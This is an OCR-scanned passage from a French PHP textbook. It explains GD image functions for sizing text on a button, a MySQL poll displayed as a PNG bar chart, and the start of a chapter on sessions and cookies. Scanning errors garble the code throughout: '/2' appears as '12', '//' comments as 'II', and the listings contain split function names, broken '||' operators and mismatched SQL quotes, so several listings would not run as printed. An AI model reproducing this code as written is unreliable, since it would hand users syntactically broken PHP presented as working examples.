$hauteur_image_sans_marge = $hauteur_image - (2 * 18); 

II faut egalement fixer la taille initiale de la police. Nous commencons par 32 (en realite 33, 
mais presque immediatement decrementee a 32), qui correspond a la taille maximale 
avec laquelle un caractere peut s'afficher en entier sur le bouton : 

$taille_police = 33; 

Avec GD2, vous devez specifier l'emplacement de vos polices de caracteres avec la 
variable d'environnement GDFONTPATH, de la maniere suivante : 

putenv( ' GDFONTPATH=C : \WINNT\Fonts ' ) ; 

Nous devons egalement determiner le nom de la police a utiliser. Nous emploierons les 
fonctions PHP pour les types TrueType ; celles-ci recherchent le fichier de la police 
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specifiee a 1' emplacement precedemment indique en ajoutant le suffixe . ttf (TrueType 
Font) au nom de la police : 

$nom_police = 'arial'; 

Selon les systemes d'exploitation, vous pouvez avoir besoin d'ajouter .ttf a la fin du 
nom de la police. 

Si vous ne disposez pas de la police Arial (la police utilisee ici), vous pouvez facilement 
en changer pour une autre police TrueType. 

Ensuite, nous nous servons d'une boucle pour decrementer la taille de la police, jusqu'a 
obtenir un texte qui puisse s'afficher correctement sur le bouton : 

do { 

$taille_police-- ; 

// Determine la taille du texte avec cette taille de police. 
$bbox=imagettf bbox($taille_police, 0, $nom_police, $texte_bouton) ; 

$texte_droite = $bbox[2]; // coordonnee droite 
$texte_gauche = $bbox[0]; // coordonnee gauche 
$largeur_texte = $texte_droite - $texte_gauche; // largeur ? 
$hauteur_texte = abs($bbox[7] - $bbox[1]); // hauteur ? 

} while ( $taille_police >8 && 

($hauteur_texte > $hauteur_texte_sans_marge | | 
$largeur_texte > $largeur_texte_sans_marge) 

); 

Ce code teste la taille du texte en determinant ce que Ton appelle le "cadre de delimi- 
tation" (bounding box) du texte, au moyen de la fonction imagettf bbox ( ) , qui est 
l'une des fonctions PHP pour les polices TrueType. Une fois que la taille optimale 
aura ete determinee, le texte sera affiche sur le bouton avec une police TrueType (nous 
avons ici choisi Arial mais vous pouvez utiliser celle qui vous convient) et la fonction 
imagettf text ( ). 

Le cadre de delimitation d'un texte est le plus petit cadre qui peut etre trace autour du 
texte. La Figure 20.6 montre un exemple de cadre de delimitation. 



(0,0) 


Our Company 







Figure 20.6 

Les coordonnees du cadre de delimitation sont donnees par rapport a la ligne de base. 
L'origine des coordonnees est montree ici sous la forme (0,0). 
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Pour obtenir les dimensions du cadre de delimitation du texte, nous appelons : 

$bbox=imagettfbbox($taille_police, 0, $nom_police, $texte_bouton) ; 

Cet appel de fonction est interprete de la maniere suivante : "Pour une taille de police 
$taille police donnee, une inclinaison du texte de zero degre et la police TrueType 
Arial, quelles sont les dimensions du texte enregistre dans $texte bouton ?" 

Notez que le chemin d'acces au fichier contenant la police doit etre passe comme para- 
metre a la fonction. Ici, ce fichier etant stocke dans le meme repertoire que le script, il 
n'est pas necessaire de preciser l'integralite du chemin d'acces. 

La fonction imagettf bbox ( ) renvoie un tableau contenant les coordonnees des coins du 
cadre de delimitation. Le contenu de ce tableau est decrit au Tableau 20. 1 . 

Tableau 20.1 : Contenu du tableau decrivant le cadre de delimitation 



Cle Contenu 

coordonnee x, coin inferieur gauche 

1 coordonnee y, coin inferieur gauche 

2 coordonnee x, coin inferieur droit 

3 coordonnee y, coin inferieur droit 

4 coordonnee x, coin superieur droit 

5 coordonnee y, coin superieur droit 

6 coordonnee x, coin superieur gauche 

7 coordonnee y, coin superieur gauche 



Pour memoriser la signification du contenu de ce tableau, il suffit de noter que la nume- 
rotation commence par le coin inferieur gauche du cadre de delimitation et qu'elle se 
poursuit dans le sens inverse des aiguilles d'une montre. 

Les valeurs renvoyees par imagettf bbox ( ) presentent toutefois une difficulte. II s'agit 
en effet de coordonnees a partir d'une origine. Or, contrairement aux coordonnees des 
images, qui sont donnees par rapport au coin superieur gauche, ces coordonnees sont 
relatives a une ligne de base. 

Examinez une fois encore la Figure 20.6 et vous remarquerez qu'un trait souligne le 
texte, quasiment sur toute sa longueur. Ce trait est la "ligne de base". Certaines lettres 
depassent en partie sous cette ligne de base, comme y dans l'exemple donne ici. Ces 
lettres sont appelees "lettres a jambage". 
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L'extremite gauche de la ligne de base sert de point d'origine des mesures et a done 
pour coordonnees (X) et (Y). Les points situes au-dessus de la ligne de base se 
caracterisent par une coordonnee X positive, tandis que ceux situes au-dessous de la 
ligne de base ont une coordonnee X negative. 

En outre, il peut arriver que les coordonnees definissant la position du texte correspon- 
dent a des points situes en dehors du cadre de delimitation. Par exemple, la position de 
depart du texte peut correspondre a une coordonnee X de -1. 

Ce systeme de description de la position du texte est evidemment d'un emploi delicat et 
necessite done beaucoup d' attention. 

Dans le Listing 20.2, la largeur et la hauteur du texte sont determinees de la maniere 
suivante : 

$texte_droite = $bbox[2]; // coordonnee droite 
$texte_gauche = $bbox[0]; // coordonnee gauche 
$largeur_texte = $texte_droite - $texte_gauche; // largeur ? 
$hauteur_texte = abs($bbox[7] - $bbox[1]); // hauteur ? 

Vient ensuite le test de la condition de la boucle : 

} while ( $taille_police >8 && 

($hauteur_texte > $hauteur_texte_sans_marge | | 
$largeur_texte > $largeur_texte_sans_marge) 

); 

Ici, on teste deux ensembles de conditions. Le premier porte sur la lisibilite du texte : 
une taille de caractere inferieure a 8 points n'aurait pas de sens car le texte du bouton 
deviendrait illisible. Le second permet de tester si le texte "tient" dans l'espace prevu a 
cet effet. 

Ensuite, le code determine si le processus iteratif a permis de trouver une taille de 
police acceptable. Si ce n'est pas le cas, il produit un message d'erreur : 

if ( $hauteur_texte > $hauteur_texte_sans_marge [ | 
$largeur_texte > $largeur_texte_sans_marge ) { 
// Aucune taille de police ne tiendra dans le bouton 
echo 'Le texte indique ne tient pas dans le bouton. <br />'; 

} 

Positionnement du texte 

Si tout s'est bien passe jusqu'a ce stade, le code determine la position de depart du texte 
en prenant le milieu de l'espace disponible : 

$texte_x = $largeur_image/2.0 - $largeur_texte/2.0; 
$texte_y = $hauteur_image/2.0 - $hauteur_texte/2.0 ; 
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Compte tenu des complications apportees par le systeme de coordonnees relatif a la 
ligne de base, des facteurs de correction sont necessaries : 

if ($texte_gauche < 0) { 

$texte_x += abs($texte_gauche) ; // ajout d'un debordement gauche. 

} 

$ligne_texte_dessus = abs($bbox[7] ) ; // distance au-dessus de la base ? 
$texte_y += $ligne_texte_dessus; // ajout d'un facteur de hauteur. 

$texte_y -= 2; // ajustement pour la forme de notre modele. 

Ces facteurs correctifs permettent de compenser un leger decalage de l'image vers le 
haut. 

Ecriture du texte sur le bouton 

La suite du script ne pose pas de difficulte particuliere. On choisit le blanc comme 
couleur du texte : 

$blanc = imagecolorallocate ($im, 255, 255, 255); 

On appelle ensuite la fonction imagettf text ( ) pour reellement dessiner le texte sur le 
bouton : 

imagettf text ($im, $taille_police, 0, $texte_x, $texte_y, $blanc, 
$nom_police, $texte_bouton) ; 

Les nombreux parametres requis par la fonction imagettf text ( ) sont, dans l'ordre, 
1'identificateur de l'image, la taille de la police en points, Tangle d'inclinaison du texte, 
les coordonnees X et Y de depart du texte, la couleur du texte, le fichier contenant la 
police et, enfm, le texte lui-meme. 



Info 



Le fichier contenant la police doit etre disponible sur le serveur. En revanche, il n'est pas 
necessaire sur I'ordinateur du client, parce que celui-ci verra ce fichier comme une image. 



Fin du traitement 

Enfm, le bouton peut etre envoye au navigateur : 

Header( 'Content-type: image/png' ) ; 
imagepng($im) ; 

II est alors temps de liberer les ressources et d'achever le script : 
imagedestroy ($im) ; 

Si l'execution du script s'est bien deroulee jusqu'a ce stade, un bouton doit s'afficher 
dans la fenetre du navigateur (voir Figure 20.5). 
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Representation graphique de donnees numeriques 

Dans l'application que nous venons d'etudier, nous avons manipule des images et du 
texte existants. Nous allons a present examiner un exemple de dessin dynamique. 

Dans ce nouvel exemple, un site web realise un sondage pour determiner les intentions 
de vote de ses visiteurs dans la perspective d'une election Active. Les resultats du 
sondage en ligne sont enregistres dans une base de donnees MySQL, puis representes 
sous la forme d'un histogramme en utilisant des fonctions de dessin. 

Le trace de graphes constitue l'autre grand domaine d'utilisation des fonctions de crea- 
tion et de manipulation d' image. Vous pouvez tracer des graphes a partir de n'importe 
quel ensemble de donnees : des ventes, la frequentation d'un site, etc. 

Pour notre exemple, nous avons cree une base de donnees denommee votes. Cette base 
de donnees contient une table resultats votes qui enregistre dans la colonne candi 
dat les noms des candidats a l'election et dans la colonne nb votes le nombre de votes 
pour chaque candidat. Nous avons egalement cree un utilisateur pour cette base de 
donnees : l'utilisateur votes avec le mot de passe votes. Cette table est tres simple a 
mettre en place ; vous pouvez la creer en executant le script SQL du Listing 20.3. II 
vous suffit d'injecter ce script apres vous etre connecte sous le compte de l'utilisateur 
root de MySQL : 

mysql -u root -p < conf ig_votes . sql 

Bien entendu, vous pouvez egalement ouvrir une session avec les identifiants de 
n'importe quel utilisateur beneficiant des privileges MySQL appropries. 

Listing 20.3 : config_votes.sql — Creation de la base de donnees votes 

create database votes; 
use votes; 

create table resultats_votes ( 
candidat varchar(30), 
nb_votes int 

); 

insert into resultats_votes values 
( 'Jean Dupont ' , 0) , 
( 1 Marie Martin , 0) , 
( 1 Fred Durand ' , 0) 

j 

grant all privileges 
on votes.* 
to votes@localhost 
identified by 'votes'; 



Cette base de donnees contient trois candidats. Le fichier vote.html fournit l'interface 
pour ce sondage en ligne. Son contenu est presente dans le Listing 20.4. 
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Listing 20.4 : vote.html — Les internautes peuvent exprimer leur intention de vote 
dans ce formulaire 



<html> 
<head> 

<title>Sondage</title> 
<head> 
<body> 

<M>Sondage</h1> 

<p>Pour qui voterez-vous lors de l'election ?</p> 

<form method="post" action="affiche_votes.php"> 

<input type="radio" name=vote value="Jean Dupont">Jean Dupont<br /> 
<input type="radio" name=vote value="Marie Martin ">Marie Martin<br /> 
<input type="radio" name=vote value="Fred Durand">Fred Durand<br /> 
<br /> 

<input type="submit" value="Resultats"> 
</f orm> 
</body> 
</html> 



Le resultat du chargement de la page vote.html est montre a la Figure 20.7. 



Figure 20.7 

Les utilisateurs peuvent fake 
part de leur intention de vote 
via ce formulaire. En cliquant 
sur le bouton Resultat s, ils 
accedentaux resultats courants 
du sondage. 



Sondage CD 



Sondage 



Pour qui votcrcz-vous lors dc Mention ? 

8 John Smith 
- Mary Jones 
_ Fred Bloggs 

Resu tats 



Le principe de cette application est le suivant : lorsqu'un utilisateur clique sur le bouton 
Resultats, son vote doit tout d'abord etre ajoute a la base de donnees Votes. Ensuite, 
les resultats courants du sondage, y compris l'intention de vote qui vient d'etre exprimee, 
doivent etre afnehes sous forme d'histogramme. 

Le resultat type affiche apres la saisie de quelques intentions de vote est montre a la 
Figure 20.8. 

Le script produisant 1' image de la Figure 20.8 etant assez long, nous le decomposerons 
en quatre parties que nous examinerons separement. L'essentiel de ce script vous est 
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deja familier : nous avons examine jusqu'ici plusieurs exemples MySQL analogues a 
celui-ci. Par ailleurs, vous avez precedemment appris a peindre un canevas d'arriere- 
plan avec une couleur unie et a dessiner des intitules textuels sur des boutons. 



\£- 5how_polLphp [PNG Image, 500x230 pixels} - Mpzilla Firefox 



File Edit View History Bookmarks Tools Help 




Figure 20.8 

Les resultats des intentions de vote sont representes graphiquement sous la forme d'une serie 
de traits, de rectangles et d'elements textuels dessines sur un canevas. 



Les parties nouvelles de ce script concernent le dessin de lignes et de rectangles. Nous 
nous concentrerons done particulierement sur ces sections. La premiere partie (des 
quatre parties que compte ce script) est presentee dans le Listing 20.5.1. 

Listing 20.5.1 : affiche_votes.php — La premiere partie met a jour la base de donnees 
et recupere les nouveaux resultats 



<?php 

/****************************************************** 

Requete pour obtenir des informations sur le sondage 
******************************************************* i 

II Recupere le vote du formulaire 
$vote=$_REQUEST[ 'vote' ] ; 

// Connexion a la base de donnees 

if (!$conn = new mysqli( ' localhost ' , 'votes', 'votes', 'votes')) { 
echo 'Impossible de se connecter a la base de donnees. <br />'; 
exit; 

} 

if ( ! empty ($vote) ) { // Si le formulaire est rempli, ajoute le vote 
$vote = addslashes($vote) ; 
$requete = "update resultats_votes 

set nb_votes = nb_votes + 1 

where candidat = '$vote'"; 
if ( ! ($resultat = @$conn->query ($requete) ) ) { 
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echo 'Impossible de se connecter a la base de donnees. <br />'; 
exit; 

} 

} 

// Recupere le resultat courant du sondage 
$requete = 'select * from resultats_votes ' ; 
if ( ! ($resultat = @$conn->query ($requete) ) ) { 

echo 'Impossible de se connecter a la base de donnees. <br />'; 

exit; 

} 

$nb_candidats = $resultat->num_rows ; 

// Calcul du nombre total de votes actuel 
$total_votes = 0; 

while ($ligne = $resultat->f etch_obj ect ( ) ) { 
$total_votes += $ligne->nb_votes; 

} 

$resultat->data_seek(0) ; // Reinitialise le pointeur du resultat 



Cette premiere partie etablit la connexion a la base de donnees MySQL, actualise les 
intentions de vote en prenant en compte les donnees entrees par l'utilisateur et recupere 
les resultats courants du sondage. Ces informations connues, il est possible d'entrepren- 
dre les calculs necessaries a la representation graphique. La deuxieme partie de cette 
application est presentee dans le Listing 20.5.2. 

Listing 20.5.2 : affiche_votes.php — La deuxieme partie definit toutes les variables 
necessaires au trace du graphe 

/*********************************************** 

Calculs preliminaires pour le trace du graphe 

************************************************ i 

II Initialisation des constantes 
putenv( ' GDF0NTPATH=C : \WINDOWS\Fonts ' ) ; 

$largeur = 500; // Largeur d'une image en pixels pour tenir dans 640x480 

$marge_gauche = 50; // Espace laisse a gauche du graphe 

$marge_droite =50; // Idem a droite 

$hauteur_barre = 40; 

$espace_barre = $hauteur_barre/2; 

$police = ' arial ' ; 

$taille_titre = 16; // Points 

$taille_principale = 12; // Point 

$petite_taille =12; // Points 

$indentation_texte = 10; // Position des labels au bord de l'image 
// Configuration du point initial du trace 

$x = $marge_gauche + 60; // Emplacement de la ligne de base du graphe 
$y = 50; // Idem 

// un "point" sur le graphe 

$unite_barre = ($largeur - ($x + $marge_droite) ) / 100; 

// Hauteur calculee du graphe - barres + espaces + marges 
$hauteur = $nb_candidats * ($hauteur_barre + $espace_barre) + 50; 
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La deuxieme partie de 1' application consiste en la definition des variables necessaries 
au trace du graphe. 

Le choix des valeurs pour ces variables peut se reveler assez laborieux, mais vous faci- 
literez le processus de dessin en definissant precisement l'apparence que vous voulez 
finalement obtenir. Les valeurs indiquees ici ont ainsi ete obtenues en esquissant sur 
une feuille de papier le graphe desire et en estimant les proportions requises. 

La variable $largeur contient la largeur totale du canevas utilise. Les marges gauche 
et droite doivent egalement etre definies (avec, respectivement, $marge gauche et 
$marge droite), ainsi que l'epaisseur et l'espacement des barres ($hauteur barre 
et $espace barre), la police, les tailles de police et la position des etiquettes textuelles 
($police, $taille titre, $taille principale, $petite taille et $inden 
tation texte). 

A partir de ces valeurs de base, vous pouvez ensuite effectuer plusieurs calculs. II faut 
tracer une ligne de base qui servira de ligne de depart a chacune des barres. La position 
de cette ligne de base est defame a partir de la marge gauche, en prenant en compte 
l'espace necessaire a l'affichage des etiquettes textuelles de l'axe des X et la longueur 
maximale autorisee des barres. Pour plus de souplesse, vous pourriez egalement prendre la 
largeur exacte du nom le plus long. 

Deux autres valeurs importantes sont egalement determinees dans cette deuxieme 
partie : tout d'abord, la distance sur le graphe qui represente une unite : 

$unite_barre = ($largeur - ($x + $marge_droite) ) / 100; 

La largeur d'un point est obtenue en divisant la longueur maximale d'une barre par 100 
(puisque ce graphe va representer des valeurs en pourcentage). 

La deuxieme valeur importante est la hauteur totale requise pour le canevas : 

hauteur = $nb_candidats * ($hauteur_barre + $espace_barre) + 50; 

Cette valeur est obtenue en multipliant l'epaisseur d'une barre par le nombre de barres 
et en ajoutant une longueur supplementaire pour l'affichage du titre. 

La troisieme partie du script est presentee dans le Listing 20.5.3. 

Listing 20.5.3 : affiche_votes.php — La troisieme partie definit le graphe, afin qu'il soit 
pret a recevoir des donnees 

/******************************************* 

Configuration de 1' image de base 
******************************************* / 

// Creation d'un canevas vide 

$im = imagecreatetruecolor($largeur, $hauteur) ; 



// Allocation des couleurs 
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$blanc = imagecolorallocate($im,255,255,255) ; 
$bleu = imagecolorallocate($im, 0,64, 128) ; 
$noir = imagecolorallocate($im, 0,0,0) ; 
$rose = imagecolorallocate($im,255,78,243) ; 

$couleur_texte = $noir; 
$couleur_pourcent = $noir; 
$couleur_f ond = $blanc; 
$couleur_ligne = $noir; 
$couleur_barre = $bleu; 
$couleur_nombre = $rose; 

// Creation du canevas de trace 

imagef illed rectangle ($im, 0,0, $largeur,$hauteur ,$couleur_f ond) ; 
// Trace un contour autour du canevas 

imagerectangle($im,0,0,$largeur-1 ,$hauteur-1 ,$couleur_ligne) ; 

// Ajoute un titre 

$titre = 'Resultats du sondage'; 

$dimensions_titre = imagettfbbox($taille_titre, 0, $police, $titre) ; 
$longueur_titre = $dimensions_titre[2] - $dimensions_titre[0] ; 
$hauteur_titre = abs($dimensions_titre[7] - $dimensions_titre[ 1 ] ) ; 
$titre_sur_ligne = abs($dimensions_titre[7] ) ; 
$titre_x = ($largeur-$longueur_titre) 12; II Centrer sur x 
$titre_y = ($y - $hauteur_titre) 12 + $titre_sur_ligne; // Centrer sur y 
imagettftext($im, $taille_titre , 0, $titre_x, $titre_y, 
$couleur_texte, $police, $titre); 

// Trace une ligne de base un peu au-dessus de la premiere barre 

// jusqu'un peu en dessous de la derniere. 

imageline($im, $x, $y-5, $x, $hauteur-15, $couleur_ligne) ; 



Cette troisieme partie de 1' application deflnit l'image de base, alloue les couleurs, puis 
commence le trace du graphe. 

L'arriere-plan du graphe est cette fois-ci rempli avec : 

imagef illed rectangle ($im, 0,0, $largeur,$hauteur ,$couleur_f ond) ; 

La fonction imagef illedrectangle( ), comme son nom l'indique (en tout cas, en 
anglais...), trace un rectangle rempli d'une couleur unie. Son premier parametre est, 
comme d'habitude, l'identificateur de l'image. La fonction prend ensuite en parametre 
les coordonnees X et Y du point initial et du point final du trace du rectangle. Ceux-ci 
correspondent, respectivement, au coin superieur gauche et au coin inferieur droit du 
rectangle. Ici, on remplit l'integralite du canevas avec la couleur de fond, indiquee dans 
le dernier parametre (le blanc). L'appel suivant : 

imagerectangle($im,0,0,$largeur-1 ,$hauteur-1 ,$couleur_ligne) ; 

trace ensuite une bordure noire autour du canevas. La fonction image rectangle ( ) trace 
le contour d'un rectangle au lieu de dessiner un rectangle plein. Ses parametres sont 
identiques a ceux de la fonction imagef illedrectangle( ). Vous remarquerez que, ici, 
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le rectangle est dessine jusque $largeur 1 et $hauteur 1 (c'est-a-dire de 0,0 jusqu'a 
ces valeurs) car, s'il avait ete dessine jusque $largeur et $hauteur, il serait "sorti" de la 
zone du canevas. 

Pour ecrire le titre du graphe, on utilise la meme logique et les memes fonctions que 
celles de l'exemple precedent. 

Pour finir, nous tracons la ligne de base des barres avec : 

imageline($im, $x, $y-5, $x, $hauteur-15, $couleur_ligne) ; 

La fonction imageline( ) trace une ligne sur l'image indiquee ($im), du point de coor- 
donnees ($x , $y 5) jusqu'a un autre point de coordonnees ($x , $hauteur 1 5), dans la 
couleur specifiee par $couleur ligne. 

Ici, la ligne de base est tracee en partant d'un point situe legerement au-dessus de la 
position de depart de la premiere barre, jusqu'a un point situe legerement au-dessus du 
bas du canevas. 

Nous pouvons maintenant representer les donnees dans ce graphe. La quatrieme 
partie du script est presentee dans le Listing 20.5.4. 

Listing 20.5.4 : affiche_votes.php — La quatrieme partie dessine les donnees sur le graphe 
et acheve le script 



/******************************************* 

Dessin des donnees dans le graphe 
******************************************* / 

// Obtient chaque ligne de donnees a partir de la base 
// et dessine les barres correspondantes. 
while ($ligne = $resultat->f etch_obj ect ( ) ) { 
if ($total_votes > 0) { 

$pourcent = intval( ($ligne->nb_votes/$total_votes)*100) ; 
} else { 
$pourcent = 0; 

} 

// Afficher le pourcentage pour cette valeur 
$dimensions_pourcent = imagettf bbox($taille_principale, 0, 

$police, $pourcent . '%'); 
$longueur_pourcent = $dimensions_pourcent[2] - 
$dimensions_pourcent [0]; 
imagettf text ($im, $taille_principale, 0, 

$largeur-$longueur_pourcent-$indentation_texte , 
$y+($hauteur_barre/2) , $couleur_pourcent, 
$police, $pourcent .'%'); 



// Longueur de la barre pour cette valeur 
$longueur_barre = $x + ($pourcent * $unite_barre) ; 

// Dessine la barre pour cette valeur 

imagef illedrectangle($im, $x, $y-2, $longueur_barre , 

$y+$hauteur_barre, $couleur_barre) ; 
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II Dessine le titre pour cette valeur 

imagettftext($im, $taille_principale, 0, $indentation_texte , 
$y+($hauteur_barre/2) , $couleur_texte, $police, 
"$ligne->candidat" ) ; 

// Dessine un contour montrant 100% 
imagerectangle($im, $longueur_barre+1 , $y-2, 

($x+(100*$unite_barre) ) , $y+$hauteur_barre, 
$couleur_ligne) ; 

// Affiche les nombres 

imagettftext($im, $petite_taille, 0, $x+(100*$unite_barre)-50, 
$y+($hauteur_barre/2) , $couleur_nombre, $police, 
$ligne->nb_votes . '/' . $total_votes) ; 

// Passe a la barre suivante 

$y = $y+($hauteur_barre + $espace_barre) ; 

} 

/******************************************* 

Affiche 1' image 
******************************************* j 

Header( 'Content-type: image/png 1 ) ; 
imagepng($im) ; 

/******************************************* 
Nettoyage 

******************************************* j 

imagedestroy ($im) ; 
?> 



La quatrieme partie traite chaque candidat enregistre dans la base de donnees, deter- 
mine le pourcentage des intentions de vote et trace les barres et les etiquettes pour 
chaque candidat. 

La aussi, les etiquettes sont tracees avec la fonction imagettf text ( ) . Les barres sont dessi- 
nees sous forme de rectangles pleins, au moyen de la fonction imagef illedrectangle ( ) : 

imagefilledrectangle($im, $x, $y-2, $longueur_barre, 

$y+$hauteur_barre, $couleur_barre) ; 

Les bords representant la limite des 100 % sont traces au moyen de la fonction image 
rectangle( ) : 

imagerectangle($im, $longueur_barre+1 , $y-2, 

($x+(100*$unite_barre) ) , $y+$hauteur_barre, 
$couleur_ligne) ; 

Une fois toutes les barres tracees, la fonction imagepng ( ) affiche l'image dans le naviga- 
teur. Un nettoyage final est ensuite effectue au moyen de la fonction imagedestroy ( ) . 

Le script de cet exemple, s'il est plutot long, presente l'avantage d'etre facilement adap- 
table a des besoins specifiques. II ne comprend toutefois pas de mecanisme antifraude : 
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les utilisateurs decouvriraient rapidement qu'ils peuvent voter plusieurs fois, faussant 
ainsi les resultats du sondage. 

L'approche derate dans cet exemple peut egalement etre utilisee pour dessiner des graphes 
lindanes, voire des diagrammes circulaires, a condition d' aimer les mathematiques. 

Autres fonctions de creation et de manipulation d'images 

II existe bien d' autres fonctions d' image que celles utilisees dans ce chapitre. Les 
operations de dessin avec un langage de programmation prennent du temps et requie- 
rent un certain nombre de tentatives, d'echecs et de corrections pour parvenir a leurs 
fins. Faites en sorte de toujours planifier vos traces avant de vous plonger dans le 
manuel pour trouver les fonctions qui vous permettront d'atteindre l'objectif vise. 

Pour aller plus loin 

Vous trouverez en ligne une abondante documentation sur ce sujet. Si vous rencontrez 
des difficultes lors de la mise en oeuvre d'une fonction de creation ou de manipulation 
d'image, vous gagnerez sans doute a consulter la documentation d'origine de la biblio- 
theque GD (http://www.libgd.org/Documentation/), car les fonctions PHP ne sont 
finalement que des enveloppes pour cette bibliotheque. Cependant, n'oubliez pas que la 
version PHP de GD2 est un "fork" de la bibliotheque principale et certains details 
peuvent etre differents. 

Sur le Web, vous trouverez egalement d'excellents didacticiels sur des types particuliers 
d' applications de trace de graphes, notamment sur les sites de Zend (http:// 
www.zend.com) et de Devshed (http://devshed.com). 

L' application de trace d'histogramme decrite dans ce chapitre s'inspire du script de 
trace dynamique d'histogramme, ecrit par Steve Maranda et disponible sur le site de 
Devshed. 

Pour la suite 

Au chapitre suivant, nous examinerons le controle des sessions en PHP. 
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Ce chapitre explique comment controler les sessions utilisateurs en PHP. 

Qu'est-ce que le controle de session ? 

Peut-etre avez-vous deja entendu dire que "HTTP est un protocole sans etat (stateless)" . 
Cela signifie simplement que le protocole HTTP n'integre pas de mecanisme pour 
memoriser l'etat entre deux transactions. Lorsqu'un utilisateur demande une page, puis 
une autre, HTTP n' off re aucun moyen de preciser que ces deux requetes emanent du 
meme utilisateur. 

Le controle de session a pour but de permettre le suivi d'un utilisateur tout au long 
d'une session sur un site web. Grace a lui, il devient facile de mettre en place un 
systeme de connexion des utilisateurs et d'afficher selectivement le contenu d'un site 
web en fonction du niveau d'autorisation ou des preferences personnelles des utilisa- 
teurs. Le comportement d'un visiteur peut ainsi etre suivi et enregistre et il devient 
possible d'implementer des paniers virtuels. 

Depuis la version 4, PHP integre des fonctions de controle de session, mais le principe 
de ce controle a un peu change grace a 1' introduction des variables superglobales puisque 
Ton peut desormais utiliser la variable $ SESSION. 
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Fonctionnalite de base d'une session 

En PHP, chaque session est caracterisee par un identifiant unique (ID de session) qui est 
un nombre aleatoire chiffre. Cet ID est genera par PHP et enregistre sur la machine du 
client pendant toute la duree de la session. II peut etre conserve sur l'ordinateur du client 
dans un cookie ou etre transmis via les URL. 

Un ID de session joue le role d'une cle permettant d'enregistrer des variables particulieres 
appelees variables de session. Le contenu de ces variables est conserve sur le serveur. 
LID de session est la seule information visible du cote du client. Si, au cours d'une 
connexion particuliere etablie avec votre site, l'ID de session est visible via un cookie 
ou via l'URL, vous pouvez acceder aux variables de session conservees sur le serveur 
pour cette session. Par defaut, les variables de session sont conservees sur le serveur dans 
des fichiers plats (il est egalement possible d'utiliser une base de donnees, mais il faut 
alors ecrire sa propre fonction d'enregistrement des donnees de session - nous reviendrons 
sur cette possibility dans la section "Configuration d'un controle de session"). 

Vous avez probablement deja rencontre des sites web ou l'ID de session est enregistre 
dans l'URL : lorsqu'une URL contient des donnees apparemment aleatoires, il est fort 
probable que ces donnees servent au controle de session. 

Les cookies apportent une reponse differente au probleme de la memorisation de l'etat 
entre plusieurs transactions et permettent de conserver des URL "propres". 

Qu'est-ce qu'un cookie ? 

Un cookie est un petit fichier texte que des scripts peuvent enregistrer sur l'ordinateur 
du client. Pour creer un cookie sur l'ordinateur d'un utilisateur, il suffit d'envoyer un 
en-tete HTTP contenant des informations au format suivant : 

Set-Cookie: N0M=VALEUR; [ expires=DA7"£; ] [path=CWEMI/V; ] [domain=N0M_D0MAINE; ] 
[secure] 

Cet en-tete cree un cookie appele NOM avec la valeur VALEUR. Tous les autres parametres 
sont facultatifs. Le champ expires defmit la date au-dela de laquelle le cookie ne sera 
plus valide (si ce parametre n'est pas precise, le cookie devient permanent, a moins 
d'etre supprime manuellement par vous ou par 1' utilisateur). Les parametres path et 
domain peuvent etre utilises ensemble pour indiquer les URL auxquelles sera associe le 
cookie. Le mot-cle secure indique que le cookie ne peut etre envoye que via une 
connexion HTTPS securisee. 

Lorsqu'un navigateur web se connecte sur une URL, il commence par examiner les 
cookies stockes localement : s'il en trouve qui sont associes a cette URL, il les envoie 
au serveur. 
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Creation de cookies a partir d'un script PHP 

La fonction setcookie() permet de creer manuellement des cookies en PHP. Son 
prototype est le suivant : 

bool setcookie(string nom [, string valeur [, int expiration 

[, string chemin [, string domaine [, int secure]]]]]) 

Ces parametres correspondent exactement a ceux de l'en-tete Set Cookie de HTTP, 
mentionne precedemment. 

Si vous avez defini un cookie de la maniere suivante : 

setcookie ( "mon_cookie" , "valeur"); 

vous aurez acces a ce cookie via $ COOKIE [ ' mon cookie ' ] lorsque l'utilisateur visitera 
la page suivante de votre site (ou lorsqu'il rechargera la page courante). 

Vous pouvez supprimer un cookie avec un nouvel appel de setcookie ( ) en utilisant le 
meme nom de cookie et en precisant une date d'expiration depassee. Un cookie peut 
egalement etre cree manuellement, avec la fonction header (), en utilisant la syntaxe de 
l'en-tete vu plus haut. Pour que cela fonctionne, les en-tetes de cookie doivent impera- 
tivement etre envoyes avant tout autre en-tete (c'est une restriction due aux cookies et 
non a PHP). 

Utilisation des cookies avec des sessions 

L'utilisation de cookies pose quelques problemes : certains navigateurs n'acceptent pas 
les cookies et certains utilisateurs les desactivent volontairement. C'est l'une des 
raisons pour lesquelles les sessions PHP utilisent la double methode cookie/URL (nous 
reviendrons sur ce point un peu plus loin). 

II n'est pas necessaire de defmir manuellement des cookies lorsque Ton utilise des 
sessions PHP car les fonctions de controle des sessions s'en chargent automatiquement. 

La fonction session get cookie params() permet d'acceder au contenu du cookie 
defini par un controle de session. Cette fonction renvoie un tableau associatif contenant 
les elements lifetime, path et domain. 

Vous pouvez egalement utiliser la fonction session set cookie params ( ) de la facon 
suivante : 

session_set_cookie_params ($expiration , $chemin, $domaine [, $secure]); 
pour defmir les parametres du cookie de session. 

Pour en savoir plus sur les cookies, consultez la specification relative aux cookies publiee 
sur le site de Netscape, a l'URL http://wp.netscape.com/newsref/std/cookie_spec.html 

(ce document se decrit comme une "specification preliminaire", mais il en va ainsi depuis 
1995 et il est aussi pres d'un standard qu'un document puisse l'etre !). 
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Stockage de I'lD de session 

PHP utilisant par defaut des cookies pour les sessions, il tentera de creer un cookie pour 
stacker 1'ID de la session courante. 

PHP peut aussi utiliser 1' autre methode de stockage des ID de session, consistant a 
ajouter 1'ID de session a l'URL associee. Vous pouvez configurer PHP pour que cette 
seconde methode soit automatiquement utilisee, en positionnant la directive 
session . use trans sid dans le fichier php.ini. Elle est desactivee par defaut. 

L'lD de session peut egalement etre integre dans un lien hypertexte. L'lD de session 
etant stocke dans la constante SID, vous pouvez l'ajouter manuellement a la fin d'un 
lien, a la maniere d'un parametre GET : 

<A HREF="lien.php?<?php echo striptags(SID) ; ?>"> 

La fonction strip tags ( ) est utilisee ici pour eviter les attaques XSS (cross-site scripting). 

Cela dit, il est generalement plus simple de compiler PHP avec l'option enable 
trans sid option. 

Implementation d'un controle de session simple 

Les principales etapes d'un controle de session sont : 

1. Demarrage d'une session. 

2. Enregistrement des variables de la session. 

3. Utilisation des variables de la session. 

4. Suppression des variables et destruction de la session. 

Ces etapes ne doivent pas necessairement etre toutes realisees dans le meme script. 
Nous allons a present les examiner une par une. 

Demarrage d'une session 

